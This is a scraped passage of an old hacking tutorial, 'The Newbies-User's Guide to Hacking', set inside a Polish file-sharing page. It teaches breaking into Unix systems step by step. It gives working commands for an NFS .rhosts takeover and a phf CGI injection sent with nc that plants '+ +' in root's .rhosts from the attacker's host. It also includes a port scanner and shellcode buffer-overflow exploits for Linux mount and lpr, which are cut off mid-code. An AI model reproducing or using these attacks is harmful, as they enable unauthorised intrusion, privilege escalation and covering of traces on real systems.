The Newbies-User's Guide to Hacking, Komputer, More Hacking

[ Pobierz całość w formacie PDF ]
User's guide__________________________Well, howdi folks... I guess you are all wondering who's this guy (me)that's trying to show you a bit of everything... ?Well, I ain't telling you anything of that...Copyright, and other stuff like this (below).Copyright and stuff...______________________If you feel offended by this subject (hacking) or you think that you coulddo better, don't read the below information...This file is for educational purposes ONLY...;)I ain't responsible for any damages you made after reading this...(I'm veryserious...)So this can be copied, but not modified (send me the changes, and if theyare good, I'll include them ).Don't read it, 'cuz it might be illegal.I warned you...If you would like to continue, press <PgDown>.Intro: Hacking step by step._________________________________________________________________________________Well, this ain't exactely for begginers, but it'll have to do.What all hackers has to know is that there are 4 steps in hacking...Step 1: Getting access to site.Step 2: Hacking r00t.Step 3: Covering your traces.Step 4: Keeping that account.Ok. In the next pages we'll see exactely what I ment.Step 1: Getting access._______Well folks, there are several methods to get access to a site.I'll try to explain the most used ones.The first thing I do is see if the system has an export list:mysite:~>/usr/sbin/showmount -e victim.site.comRPC: Program not registered.If it gives a message like this one, then it's time to search another wayin.What I was trying to do was to exploit an old security problem by mostSUN OS's that could allow an remote attacker to add a .rhosts to a usershome directory... (That was possible if the site had mounted their homedirectory.Let's see what happens...mysite:~>/usr/sbin/showmount -e victim1.site.com/usr victim2.site.com/home (everyone)/cdrom (everyone)mysite:~>mkdir /tmp/mountmysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/mysite:~>ls -sal /tmp/mounttotal 91 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/1 -rw------- 1 root root 242 Mar 9 1997 sudoers1 drwx------ 3 test 100 1024 Oct 8 21:05 test/1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/Well, we wanna hack into rapper's home.mysite:~>iduid=0 euid=0mysite:~>whoamirootmysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwdWe use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you mightforget it on the remote server...mysite:~>su - rapperWelcome to rapper's user.mysite:~>ls -lsa /tmp/mount/total 91 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/1 -rw------- 1 root root 242 Mar 9 1997 sudoers1 drwx------ 3 test 100 1024 Oct 8 21:05 test/1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/So we own this guy's home directory...mysite:~>echo "+ +" > rapper/.rhostsmysite:~>cd /mysite:~>rlogin victim1.site.comWelcome to Victim.Site.Com.SunOs ver....(crap).victim1:~$This is the first method...Another method could be to see if the site has an open 80 port. That wouldmean that the site has a web page.(And that's very bad, 'cuz it usually it's vulnerable).Below I include the source of a scanner that helped me when NMAP wasn't written.NMAP is a scanner that does even stealth scanning, so lots of systems won'trecord it./* -*-C-*- tcpprobe.c *//* tcpprobe - report on which tcp ports accept connections *//* IO ERROR, error@axs.net, Sep 15, 1995 */#include <stdio.h>#include <sys/socket.h>#include <netinet/in.h>#include <errno.h>#include <netdb.h>#include <signal.h>int main(int argc, char **argv){int probeport = 0;struct hostent *host;int err, i, net;struct sockaddr_in sa;if (argc != 2) {printf("Usage: %s hostname\n", argv[0]);exit(1);}for (i = 1; i < 1024; i++) {strncpy((char *)&sa, "", sizeof sa);sa.sin_family = AF_INET;if (isdigit(*argv[1]))sa.sin_addr.s_addr = inet_addr(argv[1]);else if ((host = gethostbyname(argv[1])) != 0)strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);else {herror(argv[1]);exit(2);}sa.sin_port = htons(i);net = socket(AF_INET, SOCK_STREAM, 0);if (net < 0) {perror("\nsocket");exit(2);}err = connect(net, (struct sockaddr *) &sa, sizeof sa);if (err < 0) {printf("%s %-5d %s\r", argv[1], i, strerror(errno));fflush(stdout);} else {printf("%s %-5d accepted. \n", argv[1], i);if (shutdown(net, 2) < 0) {perror("\nshutdown");exit(2);}}close(net);}printf(" \r");fflush(stdout);return (0);}Well, now be very carefull with the below exploits, because they usually getlogged.Besides, if you really wanna get a source file from /cgi-bin/ use thisIf you don't wanna do that, then do a :mysite:~>echo "+ +" > /tmp/rhostsmysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+/root/.rhosts" | nc -v - 20 victim1.site.com 80thenmysite:~>rlogin -l root victim1.site.comWelcome to Victim1.Site.Com.victim1:~#Or, maybe, just try to find out usernames and passwords...The usual users are "test", "guest", and maybe the owner of the site...I usually don't do such things, but you can...Or if the site is really old, use that (quote site exec) old bug forwu.ftpd.There are a lot of other exploits, like the remote exploits (innd, imap2,pop3, etc...) that you can find at rootshell.connectnet.com or atdhp.com/~fyodor.Enough about this topic. (besides, if you can finger the site, you canfiggure out usernames and maybe by guessing passwords (sigh!) you could getaccess to the site).Step 2: Hacking r00t.______First you have to find the system it's running...a). LINUXALL versions:A big bug for all linux versions is mount/umount and (maybe) lpr./* Mount Exploit for Linux, Jul 30 1996::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````""::::::::::::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ :::::::::::::...........:::...........:::...........::.......:......:.......:::::::::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::Discovered and Coded by Bloodmask & VioCovin Security 1996*/#include <unistd.h>#include <stdio.h>#include <stdlib.h>#include <fcntl.h>#include <sys/stat.h>#define PATH_MOUNT "/bin/mount"#define BUFFER_SIZE 1024#define DEFAULT_OFFSET 50u_long get_esp(){__asm__("movl %esp, %eax");}main(int argc, char **argv){u_char execshell[] ="\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f""\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd""\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";char *buff = NULL;unsigned long *addr_ptr = NULL;char *ptr = NULL;int i;int ofs = DEFAULT_OFFSET;buff = malloc(4096);if(!buff){printf("can't allocate memory\n");exit(0);}ptr = buff;/* fill start of buffer with nops */memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));ptr += BUFFER_SIZE-strlen(execshell);/* stick asm code into the buffer */for(i=0;i < strlen(execshell);i++)*(ptr++) = execshell[i];addr_ptr = (long *)ptr;for(i=0;i < (8/4);i++)*(addr_ptr++) = get_esp() + ofs;ptr = (char *)addr_ptr;*ptr = 0;(void)alarm((u_int)0);printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");execl(PATH_MOUNT, "mount", buff, NULL);}/*LPR exploit:I don't know the author...*/#include <stdio.h>#include <stdlib.h>#include <unistd.h>#define DEFAULT_OFFSET 50#define BUFFER_SIZE 1023long get_esp(void){__asm__("movl %esp,%eax\n");}void main(){char *buff = NULL;unsigned long *addr_ptr = NULL;char *ptr = NULL;u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07""\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12""\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8""\xd7\xff\xff\xff/bin/sh";int i;buff = malloc(4096);if(!buff){printf("can't allocate mem... [ Pobierz całość w formacie PDF ]

zanotowane.pl

doc.pisz.pl

pdf.pisz.pl

souvenir.htw.pl

• Home
• The Nonprofit marketing guide, ® Marketing
• The Pervert's Guide to the Cinema - Z-boczona historia kina, ! DOKUMENTALNE KONTROWERSJE, SPISKI, AFERY, NIEWYJASNIONE HISTORIE
• The Complete Guide to Transgender in the Workplace, Gender, Transseksualizm, Transseksualizm [EN]
• The New Yoga for People Over 50 A Comprehensive Guide for Midlife & Older Beginners by Francina, YOGA
• The Insane Sharecash Guide, PPD (Pay Per Dowload), PPD Tutorials Ultimate Collection
• The Seven Spiritual Laws of Yoga A Practical Guide to Healing Body, YOGA
• The Official Red Hat Linux Advanced Server Installation Guide, Linux
• The Best Sharecash Guide, PPD (Pay Per Dowload), PPD Tutorials Ultimate Collection
• The Illustrated Guide to Technical Analysis Signals and Phrases, Słowniki, Leksykony, Teksty o designie
• The Complete Idiot's Guide To Vitamins And Minerals 2nd Ed - (Malestrom), Zdrowie - Health
• zanotowane.pl
• doc.pisz.pl
• pdf.pisz.pl
• holtingclub.opx.pl